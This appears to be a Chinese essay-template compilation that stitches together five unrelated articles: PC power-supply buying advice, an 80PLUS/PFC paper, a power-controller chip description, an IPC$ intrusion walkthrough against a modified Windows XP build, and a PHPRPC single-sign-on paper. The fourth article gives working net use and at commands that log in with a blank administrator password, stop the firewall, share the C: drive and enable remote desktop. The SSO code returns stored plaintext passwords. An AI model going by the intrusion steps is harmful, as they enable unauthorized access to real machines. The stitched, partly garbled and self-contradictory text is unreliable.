pc电源

前言：想要写出一篇令人眼前一亮的文章吗？我们特意为您整理了5篇pc电源范文，相信会为您的写作带来帮助，发现更多的写作思路和灵感。

pc电源范文第1篇

电源在pc中的重要性往往容易被忽视，甚至有不少人抱着随便的态度选购电源。殊不知，电源选购也是有门道的，一款好的电源有利于电脑稳定健康运行。正如参加阅兵的部队职能主要是保家卫国，PC电源的职能主要是稳定供电――简单却重要，“老套”却不过时。让我们以检阅者的心态，回顾PC电源的“旧”常识、一览PC电源（下统―简称电源）的新趋势，以选购到优质、不过时的电源为目标，前进！

再加新标准，80PLUS变得更需警惕！

MC曾不止―次地向大家指出，评价电源除了看80PLUS认证之外，还要关注EMl电磁传导干扰、EMl电磁辐射干扰、电压波动、纹波大小、交叉负载能力等诸多与性能和安全环保相关的指标参数（相关参数在80PLUS官网或MC这类专业媒体的评测中都能看到）。但从普遍意义来说，80PLUS认证与电源品质成正比关系，80PLUS认证的等级越高，意味着电源的转换效率越高。想要提高转换效率，也就通常意味着电源内部的设计和元器件必须更好，这也就变相要求电源提高平均质量水平。从这个角度看，“80PLUS认证和电源品质挂钩”的说法有一定的道理。但还是那句话，不可盲信，尤其是80PLUS推出自牌等新标准后，降低了入门门槛，不可避免地放入了一些滥竽充数的型号。与之对应，一些没有通过80PLUS的产品，很可能只是因为设计思路和侧重点不同，其产品实际的用料和品质却属上乘，接下来具体问题具体分析。

警惕伪参数和伪标签

近几年一直关注电源市场的用户一定会发现市场的明显变化，很多当年充斥于一线市场专门忽悠消费者的垃圾电源逐步销声匿迹。这是一个可喜的变化，主要归功于80PLUS概念的兴起带动了用户对电源品质的关注，同时销售渠道的电商化、透明化、专业化也让DIYer的识货能力大大提升，让垃圾产品生存更艰难。

但市场真的干净了吗？我看未必，偷斤短两的型号从我们面前消失却又可能去了3、4级不太发达的市场。另外，偷换概念、玩文字游戏、打球的产品则在一线市场猖獗了起来。比如有的产品大谈电感效率、功率因数等单一指标，并不对整体转换效率产生决定影响，但却有“不服跑个分，但别跟我瞎扯做工用料”的忽悠气势。更有一些厂商昧着良心伪造类似80PLUS的标签贴在机身上混淆视听。不少消费者一看到“功率因数0.95”（以为是转换效率）、“xx650”（不提额定瓦数，实际是峰值650W）、“白金认证品质”（以为是白金牌效率，其实跟80PLUS毫无关系）等字样时很可能放松警惕。在这里除了提醒玩家们细心，还是细心、细心再细心！

警惕80PLUS队伍中的滥竽充数者

以往PC电源、工作站和服务器的非冗余电源都要求在115V（交流电）下通过测试。对于国内220V使用场景而言，电源要通过测试必须使用宽幅电压设计，这就要求电源在PFC级使用更高规格的用料。而2014年4N份80PLUS增加了230VEU Interna颐目，厂商可以在降低PFC级的用料的同时也通过230V的80PLUS认证。借此，原来一些只支持230V输入的无牌电源也可以得到认证的机会，截至本文截稿时已有超过100款电源通过该项目认证（包括金牌产品）。本来Ecova只对送测的样品负责，有时候市面上的零售版本和送测样品会有些差异，这其中的猫腻之处不可不防。可以这么说，230V EU Internal认证推出之后，考验厂商业界良心的时刻到70权衡之下，消费者在选购时如果拿不定主意，不妨无视230V EU Intemal项目这个“后进生”。与之类似的还有80PLUS白牌认证，都是降低电压适应性的要求。白牌只有110V电压下的检测标准，缺乏230V下的量化指标，对国内220V电网环境的参考意义不大，厂商容易借此缩水、减配等等。通常情况下，我们认为一款通过了80PLUS传统铜牌级以上认证的电源是靠谱的，其他的我们建议大家最好保持警惕。

“旧”常识：铭牌、元件、线路、结构、功率

无论有没有通过80PLUS等行业认证，一个正规的电源总有一个正规的铭牌。总而言之，通常“看标识别电源优劣”很多时候是可行的。当然，这需要消费者对电源的基本知识有大致的了解。

在国内，“检阅”一款电源的铭牌可以先从认证开始，抛开贴假标的情况，一款拥有80PLUS、3C、欧洲能源之星和环保之星标准等多个认证贴标的电源无疑是品质的保障。当然，如果一个电源的铭牌在关键电气参数表格中有任何一个漏标（如多路+12V不标+12V联合输出功率）或乱标（如不标额定功率，只标峰值功率），那么这样的电源可以直接无视。连参数都不敢明说，这种遮遮掩掩的态度很难让我们对电源的品质有所期待。

新技术、新趋势：使电源不易过时

电源行业要像其他数码产品一样融合最新科技、最酷体验显然不太容易。但在有心厂商的推动下，电源依然显示出智能化和注重用户体验两大亮点。

实时监控电源状态，并通过专用软件进行交互是近年来电源发展的一大趋势。如Tt的ToughpowerDPS，通过APP实时显示各项监测数据，更有曲线图表显示、电费计算等人性化功能。还有海盗船CorsairLink数字控制技术，如海盗船RMi、AXi等系列电源都支持通过Corsa’lr Link软件来实时监控电源的工作情况。通过连接专用的Corsair Link套件，玩家还能轻松调节包括电源风扇转速和LED灯效――这对“玩灯”一族而言是好消息，键盘、鼠标、主板乃至电源的个性灯光都可以轻松掌握。不得不说，这些看似微小的创新对优化用户体验是有帮助的。

在用户体验方面，电源的静音效果也是各大厂商不懈追求的一个特性。静音通常通过低转速大风扇、智能温控、风扇延迟散热技术等途径实现。如果你是完美主义者，近年来市面上出现的无风扇、全静音电源可以更好地满足你的需求。无风扇设计的电源用起来无疑是很舒适的，同时这也要求电源的转换效率必须够高，发热才能尽可能少。通常，全静音电源的元件品质也要比常规产品更出色一些，以满足耐高温、长时间持续工作等苛刻要求。

Tips：“检阅”电源还有这些要点

单、双路+12V输出的抉择：电源的+12V输出主要是负责CPU、显卡等供电需要。应对现在CPU和显卡的性能不断提升导致的功耗上升局面，单路设计可以提供更大的电流，更容易满足CPU和显卡的多样化搭配需求。双路+12V输出电流都较同功率下的单路+12V输出要小很多，显得不够灵活。单路输出设计的电源也更适合极限超频玩家使用，而双路（或多路）+12V输出的电源一般都会设计有限流电阻用来保护电源和其他硬件，因此更加适合追求稳定性的用户。从经验来看，一般的电源+12V输出功率都占总功率的80%以上，如果占比过低则有虚标嫌疑，不建议购买。

5V和+5Vsb：+5Vsb是辅助电源，主要给机箱开关等需要唤醒电脑开机所需功能的部分供电。它与+5V电源是有区别的，首先，电源通电后，就一直有+5Vsb电力输出了，而主5V电力必须在电脑开机或被唤醒状态下才有输出。有多部USB设备需要连接电脑进行“关机充电”的用户可选择+5Vsb电流充足的产品。

功率因素在交流电力系统里是针对电网的概念：功率因素低意味着电网能量损失高，为了吸收这部分无用能量，电力设备的设计容量、成本相应增加。目前来看只要是主动式PFC电源，当达到满载时功率因素都高达99%以上，消费者通常也比较难遇到被动式PFC电源。近年来在高端电源上出现了交错PFC（APFC电路的改进）等结构创新，比如交错PFC+全桥移相的结构，交错PFC+全桥LLC谐振甚至是无桥PFC技术（如海盗船AXl500i）――本文暂不展开进行深度研讨，若你对高端电源很有兴趣不妨对这些技术进行更详细的挖掘。

模组：简而言之，全模组电源的线材全部可拆卸，半模组电源除主板、CPU供电外的线材可以拆卸，而非模组电源全部线材不可拆卸。模组化接线设计的好处是，闲置接线可以拆下来，有利于机箱内布线整洁。此外模组化还使得更换个性化包线（安装线头射灯、光带线材）及根据机箱大小更换超长线、超短线等需求变成可能。但模组化接线也衍生了一些额外的接触电阻，这种接触电阻随着时间的推移和插拔次数的增加会有所提高进而导致更多的电压损失（耗电越大，电压损失的就越多，但厂家通过技术处理基本能降低该损失）。总的来看，模组化设计推高了电源的制造成本，而且可能增加产品故障的隐患，因此在服务器/工作站等行业应用场景中都会使用非模组设计电源。

pc电源范文第2篇

1．1问题的提出

80PLUS是一项针对电源所做的新标准，它的核心是加载主动式PFC电路模块用于提升计算机设备的使用效率。保证电源设备在22%、48%，以及满载时有大于84%的转换效率。简单的说，就是在不同的负载程度，能够减少多余电能转换成的废热，来降低电源的使用成本。在中国这笔费用是由各个电源生产商向国家节能减排部门进行申报后获得的。该标准最早是由美国能源局制定的效率标准，针对桌面型台式机、高性能刀片服务器及工作站所制定的节能规范，希望借此来提高计算机内部电源设备的效率与功率因数比值，减少EMI谐波危害，降低设备的发热量，以达到节能目的。图1显示转换效率从低到高分别是80PLUS的6个标准:白牌(标准版)、铜牌、银牌、金牌、铂金、钛金从上到下依次提升。PFC效率因子数值越高表示这台电源越优秀。相比普通的被动PFC电源，80PLUS标准有许多优点。

1．2主动PFC电路设计能够延长的使用寿命

图2显示了被动PFC电源的热功耗模式，根据功率校正决定电源适配器转换效率的关键在于能将百分比之多少的输入转换为输出，由于剩下的电能会转换成废热。废热的产生会增加很大的电源噪音，而风扇需以高转速来带走废热，来保证电源内部不会过热触发报警装置。目前我们所使用的电源风扇都是普通油封轴承，这种轴承的好处就是成本低，便于大面积使用。缺点是寿命短，油一旦消耗完后会产生巨大的摩擦噪音。因此，减少废热、保持低散热需求的好处即是增加电脑电源的耐用度。

1．3主动PFC电路设计能够减少热辐射功耗

例如，一个转换效率65%的额定600瓦的电源设备，在100%负载时会消耗600瓦的电力，剩下的180瓦则会转换成多余的热能。如果该电源供应器转换效率为80%，在90%负载时只需要540瓦的电力供应，那么就只有60瓦的电力转换成热能。所以如何减少这些热能非常重要，由于目前科学技术的限制，人类还无法去收集这些多余热能进行储存。因此，减少这些无用的电子消耗显得非常重要。采用温控装置的电源风扇就不必在高转数情况下进行工作，这将有效的降低电源噪音和电源内部的发热量。让电源内部的元器件保持在正常温度系数范围内进行工作。

2主动PFC技术的实用价值

2．1有源PFC电路模块的重要性

节能减排一直是很多单位关注的，80PLUS电源能够做到为机房节能。这得益于80PLUS标准电源的高功率因数(PFC值)。PFC的全英文名为“PowerFactorCorrection”，意思是“功率因数调整值”，用来表示有效功率与总耗电量(视为额定功率)之间的比值。电网供给电源的能量并不能100%被电源所利用，在电源和电网之间会存在不小的电能损失部分。这个时候PFC就诞生了，目前的PFC电源分为主动式(active)和被动式(pas-sive)两种。被动PFC电路的功率因数一般只有70－78%，有的甚至连70%都达不到。而且电源非常沉重，不利于运输。而主动PFC的功率因素通常保持在90%以上，甚至达到95%。由于不需要庞大的电感，因此重量得到了大幅度的减轻。

2．2宽频电压输出

主动PFC还有另外一项重要的附加价值，即它可以适应90Vdc－260Vdc的全范围电压，可以全球通用，特别是对于电压不稳的地区有重要的使用价值。在我国的贫困地区，及地震灾区，当地电力部门无法保障220V稳定电压的环境下，使用主动PFC的设备能够有效缓解电力异常波动造成的瞬时断电设备重启问题。在边远地区使用主动PFC设计的电源系统能够有效保障学校、医院重要部门的不间断运作。

2．3单位耗电量的下降

注意:为了满足能源之心(ENERGYSTAR)的规范指标以及国家降低碳排放的强制要求，即功率因数越大，对节约电力能源越有好处。主动PFC电源为了保证更高的转换效率，在产品的设计与用料上，都较传统电源要复杂和考究得多，这带来了生产成本的上升。但考虑到在工业用电方面的开支减少，特别是现在很多大学机房机器数量都在数千台以上，是一些专业实验室，常年24小时开机进行数据运算实验。如果按照一年一台PC即可节省200元人民币，这笔费用扩建机房升级设备都绰绰有余，从长远利益来看，未来终端用户应该多考虑带有主动PFC模块的电源。

3主动PFC技术的实现

图3显示的为PFC升压预转换器的构成，这里需要安置一个线圈，通过一个二极管和一个PF开关。蓝色箭头所指的波形电感需要一枚加载PFC预调节器而设计的功率因数校正控制器电路。这里我们使用ONSEMI半导体(MC33368和MC33260)，均工作在临界导电模式中，而NCP1650则工作于连续导电模式。通常将临界导电模式用于300W以下的功率因数控制电路。而CCM连续导通模式用于400W以上的功率因子电路模块。随着机房在教学上开设了matlab，大型数据库等课程，这些课程对计算机的硬件要求非常高，特别是大数据运算这样的模型搭建。为了满足这些设施要求，必须使用额定功率在400W以上的电源才能满足需求。CCM电路拓扑就是为了通过80PLUS标准设计的，一般采用正激拓扑(又分为单端正激拓扑和双管正激拓扑)较之前机房所使用的被动PFC普通电源，通常采用半桥拓扑。半桥拓扑均采用三极管做主开关管，正激拓扑采用MOS管进行设计，但是这样的设计会导致开关损耗均远大于MOS管。而且这类电源非常笨重。因此，半桥拓扑的转换效率一般刚刚能够突破70%，而双管正激拓扑的转换效率基本都能接近80%，设计和用料较好的就能达到85%以上。双管正激拓扑相对于半桥拓扑的另一个优势就是纹波要小得多(由其工作原理所决定)。开关电源的输出电压会有一些不规则的小幅波动，波动幅值范围一般是几十毫伏，称为纹波。纹波干扰在机房是非常普遍的一种电磁干扰，特别是机房其它的非兼容设备比较多的情况下。会造成液晶显示器摩尔纹的显示故障。这种故障会影响显示器使用者的体验感受。从另外一个方面来说，计算机的板载芯片对纹波有一定的耐受能力，但这样的范围是非常有限的，这将会导致声卡的模拟放大电路会受纹波影响导致音质失真。特别是语音室对杂音过滤的要求非常的高，而正激拓扑的纹波更小，即电源输出的电压更平稳，电流更纯净，从而延长各部件的使用寿命，更可以减少令人头疼的EMI电磁干扰问题。

4改造主动PFC电源负载性能测定试验环境

INTELXEONE－1230v316GAPACERDDR31866×28×2TRAID0磁盘阵列。额定600W电源运行测试国际象棋算法及图形4D渲染。电路板在满负载、低电压线路下工作30分钟后进行测量。所有测量是在没有中断的情况下连续进行的。采用HP34401A万用表在测试端直接测量。输入功率根据如下公式计算:Pin(avg)=Vin(rms)•Iin(rms)•PF机箱盖板打开、侧板无12cm风扇、仅使用slient模式CPU风扇运转。图4600W额定电源测试的转换效率这些结果是在一种相对高频的应用中获得的，轨迹线显示了线电压在不同负载时的效率，以中国境内230V电压标准，效率始终高于95%。100%负载下转换效率略有下降，且此时电源发热量会非常大，但相比于被动式PFC的电源来说，这样的发热量已经减少了很多。

5结语

pc电源范文第3篇

1 概述

英飞凌(Infineon)公司推出的TDA16846和TDA16847开关电源控制器自投放市场以来，在TV、VCR、SAT接收机及PC监视器等SMPS中获得了广泛应用。目前对这两种控制器进行了改进，并将改进和创新后的器件称为2型或第二代产品，型号分别为TDA16846－2和TDA16847－2。

TDA16846－2／TDA16847－2是支持低功率待机和功率因数校正?PFC?的SMPS控制器，可用于固定频率PFC或同步模式反激式变换器中，该产品既可以驱动功率MOSFET，也可以驱动双极型功率器件。TDA16846－2／TDA16847－2在轻载下具有低功耗性能，其开关频率可以随负载减轻而逐步降低。

2 TDA16846－2／47－2的结构特点

TDA16846－2和TDA16847－2采用14脚P－DIP－14－3封装，其引脚排列如图1所示。图2是这两种芯片的内部结构图。

这两种器件的不同点是TDA16846－2的8脚不接，而TDA16847－2的8脚为暂态高功率电路的电源功率管理输出（该脚通过一只电容和一个RC电路与地相连)。两种器件的引脚功能如表1所列。

表1 引脚功能

引  脚符  号功      能

1OTC内置截止时间电路，该脚与地之间连接RC电路，决定振铃抑制时间和待机频率2PCS初级电流模拟（检测）3RZ1调整和过零信号输入4SRC连接软启动和控制电压调节电容器5OC1光耦合器输入6FC2不连接（TDA16846-2）/该脚电压大于1，2V，SMPS截止） 7SYN同步输入8N.C./PMO不连接（TDA16846-2）/暂态高功率电路功率管理输出（TDA16847-2）9REF参考电压和电流10FC1故障比较器1输入（该脚电压大于1V,SMPS截止）11PVC初级电压检测12GND地13OUTMOSFET栅极驱动输出14VCC电源电压TDA16846－2／TDA16847－2除具有软启动、低功耗、低启动电流及欠压／过压保护、电流限制／短路保护及静电放电?ESD?保护功能外，还具有如下主要特点：

带有PFC，并采用电荷泵电路；

频率随负载减轻可连续降低，在待机模式下，频率可调至20kHz；

可在固定频率或同步模式下操作；

带有临时高功率电路（THPC)，具有电源管理功能(仅TDA16847－2)。

    TDA16846－2／TDA16847－2的5脚（OCI）输入电压范围扩大到0V，该脚与地之间不再需要连接电阻；7脚（SYN）改进了启动特性，阻止了变压器饱和；11脚（PVC）通过加入尖峰信号消隐，提高了抗噪扰能力；13脚（OUT）减小了截止态输出电压电平；14脚（VCC）通过尖峰消隐，改善了抗噪性能。

与先前的TDA16846／TDA16847比较，TDA16846－2和TDA16847－2除进一步强化了低功率待机功能外，还在抗噪性能方面具有明显改善。

TDA16846－2／TDA16847－2支持低功率待机功能，在彩电等应用系统中具有重要意义。美国“能源之星”等标准要求电视机的待机功耗不大于3W，根据中国节能产品认证中心?CPCE?抽样调查，国产彩电待机功耗低于3W的只占被测彩电总量的13．4％，而9W以上的却占34．8％。目前待机功耗低于3W的国产彩电系列品种虽有较大增加，但距全部实现低于3W的目标尚有一定距离。使用TDA16846－2／TDA16847－2设计的彩电SMPS可以满足低待机功耗的要求，而且可以降低成本。

图2

3 应用电路及工作原理

用TDA16846－2作控制器的SMPS电路如图3所示。为执行PFC，该电路在桥式整流器与150μF的滤波电容C07之间插入了由电感L08、二极管D08和电容C08组成的电荷泵电路，这样配合功率开关(T01），就可在桥式整流器输入端产生接近正弦波的AC电流，且与AC线路电压接近同相位，从而使线路功率因数(PF）远远大于0.90，电流总谐波失真(THD）低于20％。

3．1 启动特性

SMPS加电之后，由于滤波电容C07正极上有直流干线电压，所以与IC1 2脚连接的电阻R22将有电流通过。该电流从IC1的2脚流入，经2脚与14脚内部连接的二极管?参见图2?对14脚外部电容C26充电。一旦C26上的充电电压达到15±0．5V的导通电平以上时，芯片开始工作。器件14脚上Vcc导通电流典型值为5mA，通过C26放电使14脚上的电压下降，在尚未降至欠压关断门限时，变压器的辅助绕组(7T）将通过IC14脚外部二极管D26对芯片提供所需的电流。当IC在固定频率下工作时，为防止在启动期间出现多重脉冲，可在IC1的3脚脉冲电压超过2．5V门限之前，使IC1工作于自由振荡(free running）模式。

3．2 初级电流模拟／电流限制

电路中IC1的2脚外部电阻R22和电容C22用于产生一个与功率晶体管T01电流成正比的电压。在T01截止时，脚2上电压为1．5V，这样当C22通过R22被充电时，T01将处于导通状态。此时脚2上的电压V2可表示为：

V2＝1．5V＋LP IP／（R22 C22）

式中，LP为变压器初级绕组电感，IP为通过功率晶体管的电流。

V2一般施加到IC2脚内的导通时间比较器的同相输入端，并与反相输入端上的控制电压比较。如果V2超过控制电压，驱动器阻断，以起到电流限制作用。控制电压最大值是IC1内的5V参考电压。功率晶体管的最大电流IP(max）为：

IP(max）＝[(5V－1．5V）R22 C22]／LP

控制电压可由IC1内的误差放大器、光耦合器或IC1脚11上的电压(V11）来决定。

图3

    3．3 折回(Fold Back）点校正

IC1脚11（PVC)上的电压V11可从连接到DC总线与地之间的电阻分压器（R23与R24)上获得。如果经整流的总线电压升高，功率晶体管的最大电流IP（max)将减小。实际上，最大电流IP（max)是独立的，与DC总线电压无关。可表示为：

Ip（max)＝[（4V－V11／3)R22 C22]／Lp

3．4 截止时间电路?OTC?

IC1脚1（OTC)外部与地之间连接的R30和C30用于组成RC并联网络。当IC1驱动器关断时，内部电流源首先用0．5mA的电流对脚1外部电容C30充电。一旦脚3（RZI)上电压达到2．5V，充电电流将达到1mA，直到C30上的电压被充电到3．5V为止。C30的充电时间约为τ＝（C30 ×1．5V)／1mA。

当C30上的电压达到3．5V以后，内部电流源将被切断，C30通过R30放电。当IC1脚1上的电压施加到内部截止时间比较器时，比较器的另一个输入就是控制电压。当截止时间比较器输出高电平且脚3上的电压低于25mV时，内部导通时间触发器置位，以保证功率晶体管在最小的电压时接通。如果没有过零信号则进入IC1脚3，那么，在脚1上的电压低于1.5V之前，功率晶体管将经过一段延时之后接通。只要脚1上电压高于被限制的控制电压，导通时间触发器就会截止，以抑制脚3上不适当的过零信号。而一旦控制电压低于2V，关断时间将达到恒定的最大值(≈0．56 R30 C30）。表2列出了控制电压与输出功率及截止时间的关系。

表2 控制电压与输出功率、截止时间关系

控制电压输出功率截止时间1.5～2V低不变（达最大值）2～3.5V中减小3.5～5V高自由振荡实际上，变换器开关频率是输出功率的函数。

TDA16846－2的负载从属频率曲线如图4所示。

3．5 误差放大器／软启动

IC1的（RZI)3脚是误差放大器和过零信号输入，（SRC)4脚是控制电压输入。误差放大器的同相输入端是5V参考电压。IC1脚3上的输入信号可从变压器辅助绕组经R38和R29组成的电阻分压器获得。如果脚3上的输入脉冲高于5V门限时，脚4上的控制电压将被拉低。因此，脚4与地之间连接的电容C25可用于决定控制电压的控制速度和软启动持续时间。

    3．6 固定频率与同步化操作

在图3所示的应用电路中，由于IC1的7脚与9脚（5V参考电压输出)是连接在一起的，故IC1工作在自由振荡调节模式。

若要求IC1在固定频率下操作时，脚7与地之间必须连接并联RC网络（Rosc与Cosc)，此时，其开关频率fsw将由Rosc与Cosc设定：

fsw≈1．2／Rosc·Cosc。

因此，当Rosc＝20kΩ、Cosc＝470pF时，fsw＝88kHz。

pc电源范文第4篇

Windows系列的操作系统都提供共享服务，这些共享服务的主要通道就是IPC。IPC是Internet ProcessConnection的简称，也称共享命名管道，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限，在远程管理计算机和查看计算机的共享资源时使用。这种入侵方式在Windows 2000普及的年代非常流行。

默认情况下Windows系列的操作系统都支持空连接，空连接是在没有信任的情况下与服务器建立的会话，换句话说，它是一个到服务器的匿名访问。利用ipc$，连接者可以与目标主机建立一个空的连接而无需用户名与密码(当然，对方机器必须开了ipc$共享，否则你是连接不上的)，而XP系统限制了空连接导出用户列表的功能，提高了安全性。

默认共享是系统安装完毕后就自动开启的共享，也叫管理共享，常被管理员用于远程管理计算机。在Windows2000/XP及其以上版本中。默认开启的共享有“c$”、“d$”、“admin$”、“ipc$”等，我们可以在“运行”对话框中输入“\\计算机名\盘符$”对这些资源进行访问，以上这些共享就叫做默认共享。默认共享是只面向管理员组用户开启的共享，也就是说只有管理员组的用户才能访问这些共享，非管理员组用户(即使是超级用户)不能进行访问。如果我们在对话框中输入的不是管理员组用户而是其他用户组的账户和密码(如guest组、backup operators组、power users组等)，系统是不会让我们访问该共享资源的。另外密码不能为空，否则也连不上XP的默认共享。

通常是无法利用IPC入侵原版XP的，最主要的原因是XP与2000在来访者的权限设置上是不同的，在XP中即使有管理员权限的用户和密码也不一定能建立联接或复制文件。

身份验证：XP默认是把从网络登录的所有用户都按来宾账户处理的，因此即使管理员从网络登录也只具有来宾的权限，在XP的(secpol.msc)本地安全设置/本地策略/安全选项中：

网络访问：本地帐户的共享和安全模式，有两个选项：

经典_本地用户以自己的身份验证

仅来宾_本地用户以来宾身份验证

当番茄花园系统安装完成后，所有的盘符默认共享自动关闭，远程桌面关闭，Remote Registry服务关闭，系统只开了IPC$通信命名管道，administrator密码为空，如果安全选项和空口令设置和原版相同，则系统也将是安全的，然而问题出来了，点开始/运行输入secpol.msc，展开本地安全设置/本地策略/安全选项中的“网络访问：本地帐户的共享和安全模式”，可以发现被改为“经典”。

空口令限制：在XP的注册表中有一项limitblank.passworduse，它是用来限制空口令连接的

[HKEY_LOcAL_MAcHINE\SYSTEM\ControlSet001\Control\LsaJ]

“limitblankpassworduse”＝dword:00000001

很明显看出来，通过导人注册表来修改安全设置。

O:代表空密码有效。1:代表空密码无效。

系统默认是1，可以有效防止黑客人侵。

而在番茄花园系统中，点开始/运行输入Regedit，展开[HKEY_LoCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa]发现limitblankpassworduse被改为O。这就意味着，黑客利用了XP管理员的弱口令。

入侵番茄花园版XP，需要针对XP系统的特点，开启和关闭一些服务(假设目标IP是192.168.1.5)。

1)net use\\192.168.1.5\IPC$" "/user:"admintitrators"。

看到“命令成功完成”提示，连接成功1

2)net time\\192.168.1.5

查查时间，发现192.168.1.5的当前时间是2007/5/6下午5:12，出现“命令成功完成”提示。

3)at\\192.168.1.5 17:14 net stop“Window$Firewall/Internet connection Sharing(ICS)”

用at命令启动net stop关闭对方计算机中的Windows Firewall/Intemet Connection sharing(ICS)服务以利于关闭Windows防火墙。

4)执行at\\192.168.1.5检查任务是否安排。

5)再次执行net time\\192.168.1.5获得远程机器时间。

发现192.168.1.5的当前时间是2007/5/6下午5:29，出现“命令成功完成”提示。

6)执行at 17:30\\192.168.1.5 net share diskc＝c:

开启192.168.1.5的C盘共享。

7)打开我的电脑，输入\\192.168.1.5\diskc，新建一个文本文件，输入以下内容

echo Windows Registry Editor Version 5.00>>3389.reg

echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control\Terminal server]>>3389.reg

echo"fDenyTSConnections"＝dword:00000000>>3389.reg

echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcP]>>3389.reg

echo"PortNumber"＝dword:00000d3d>>3389.reg

echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcpl>>3389.reg

echo"PortNumber"＝dword:00000d3d>>3389.reg

regedit/s 3389.reg

del 3389.reg

将文件保存为3389.bat。

8)再次执行net time\\192.168.1.5获得远程机器时间，发现192.168.1.5的当前时间是2007/5/6下午6:29，出现“命令成功完成”提示。

9)执行at 18:30\\192.168.1.5c:\3389.bat。

10)点“开始/所有程序/附件/通讯”，运行“远程桌面连接”，输入192.168.1.5即可远程操作计算机了。

知道漏洞产生的原因后，修补起来也是相当的简单，关键是修改注册表中的limitblankpassworduse和forceguest的键值，将下面的内容保存为fix.reg，双击fix.reg，提示是否导入注册表，点确认后即可修补漏洞。

pc电源范文第5篇

关键词：PHPRPC；资源库平台；单点登录

中图分类号：TP311 文献标识码：A 文章编号：1009-3044（2013）33-7457-03

在学院 PHP项目：高职院校共享型专业教学资源库平台的开发时，需要将资源库平台与现有的精品课程平台、在线学习平台进行单点登录整合，以解决三个应用系统的统一身份认证问题，方便系统的使用以及提高用户体验。单点登录目前比较成熟和稳定的解决方案，除了商业公司的产品，如：IBM的Websphere、Sun Access Manager、Microsoft Passport以及一些基于SAML的产品，还有一些开源的解决的方案，如CAS等。这些方案技术侧重点不同，实现的机制也不尽相同。但是对于此次三个WEB应用来说，这些方案并不完全适合，原因是实现成本比较高，难度也比较大，经过比较，选择了PHPRPC作为开发组件自行开发一套单点登录系统。

1 基本原理

所谓单点登录（single sign on，简称SSO），是指由一个统一的用户登录系统管理多个应用服务，提供统一的用户认证登录。登录系统与应用之间是一对多的关系，由统一的身份认证平台管理用户登录信息，一次登录信息共享——完成登录后，即可在所有的子系统间以认证用户的身份进入系统而不必重新登录，从而避免了重复开销，提高了开发和使用效率[1]。

PHPRPC是什么？PHPRPC 是一个轻型、安全、跨网际、跨语言、跨平台、跨环境、跨域、支持复杂对象传输、支持引用参数传递、支持内容输出重定向、支持分级错误处理、支持会话、面向服务的高性能远程过程调用协议[2]。基于PHPRPC的以上诸多特性，可以利用它来实现一个跨系统、跨平台、跨语言的SSO系统。

实现原理是利用浏览器（用PHPRPC for JavaScript构造）请求中心认证服务器（用PHPRPC for PHP构造），此时的浏览器就是一个单点登录页面，浏览器将用户名和密码传递给中心认证服务器，中心认证服务器验证成功之后，查找数据库里此用户名和密码对应的信息，根据这些信息生成一个令牌（token）返回给浏览器，浏览器用token再分别访问各个应用系统，应用系统用收到token访问中心认证服务器，中心认证服务器通过这个token查找应用系统用户表，找到对应的用户名和密码，然后将这个用户名和密码返回给应用系统，应用系统再用收到的用户名和密码进行登录。SSO的登录流程如图1所示。

PHPRPC的会话（包括跨域的会话）不完全依赖 Cookie，也就是说即使浏览器完全禁用Cookie，PHPRPC也会通过Cookie-less会话方式来保持浏览器客户端与服务器之间的会话状态，从而保证SSO系统对跨域和异构系统良好的兼容性。

2 系统实现

为了便于理解，借助数据库表的E-R图来描述系统实现的过程，如图2所示。

统一认证服务器收到浏览器通过JavaScript传递过来的用户名和密码检索“认证服务器用户表”，认证通过后得到“用户ID（userId）”，根据“用户ID”去检索“应用系统用户表”，然后就会得到一条或多条记录，把每一个结果都在“会话表”中生成一条记录，这里的“会话ID（tokenId）”是表的主键，也就是所谓的token，“会话表”的第二个字段id是对应的“应用系统用户表”的id主键，再根据“应用系统ID”检索“应用系统表”，从而获得应用系统的URL地址。统一认证服务器将token与应用系统的访问地址组成一个新的数组返回给浏览器，浏览器再将传回来的token作为参数访问应用系统的服务端，应用系统使用token访问统一认证服务器获取用户名和密码，完成登录。

3 核心代码

SSO的服务端由PHPRPC for PHP构建，用服务的方式提供，认证客户端通过RPC的远程过程调用相关的认证和token验证服务实现统一身份认证。

中心认证服务器端核心代码如下：

[/* 引入phprpc服务端 */

require_once（"phprpc/phprpc_server.php"）；

/* 引入中心统一认证服务器服务类，具体程序略 */

require_once（"class/Server.class.php"）；

/* 实例化PHPRPC服务对象 */

$AuthServer=new AuthServer（$db）；

$centerAuthServer = new PHPRPC_Server（）；

/* 注册统一认证服务 */

$centerAuthServer->add（'rpcLogin'，$AuthServer）；

/* 注册Token验证服务 */

$centerAuthServer->add（'autToken'，$AuthServer）；

$centerAuthServer->start（）；＼&]

认证客户端核心代码如下：

[require_once（"phprpc/phprpc_client.php"）；

require_once（"phprpc/phprpc_server.php"）；

/* 客户端登录过程 */

function rpcLogin（$token）{

$userInfo=getUserInfo（$token）；

if （$userInfo！=false）{

//进行模拟登录

$tempLogin=login（$userInfo['username']，$userInfo['password']）；

return true；

if （$tempLogin）{

return true；

}else{

return false；

}

}else{

return false；＼&]

[ }

}

//用token去认证中心获取用户名及密码，并返回

function getUserInfo（$token）{

$client = new PHPRPC_Client（"http：//localhost/sso/AuthServer.php"）；

$userInfo=$client->autToken（$token）；

return $userInfo；

}

//用获取的用户名及密码登陆

function login（$username，$password）{

$_SESSION['login']="ok"；

$_SESSION['username']=$username；

return true；

}

$server = new PHPRPC_Server（）；

$server->add（'getUserInfo'）；

$server->add（'rpcLogin'）；

$server->start（）；＼&]

4 结束语

使用PHPRPC构建的单点登录系统，解决了专业资源库平台与精品课程平台和在线学习平台的统一身份认证问题，并提供了一个新的实现思路和方法。目前此系统能够很好的接入了这三个异构的B/S系统。针对C/S系统，因为PHPRPC也提供了Delphi、C++Builder、Kylix等语言的支持，只要根据不同的开发语言对C/S系统稍加改造就能实现与单点登录系统的对接。

参考文献：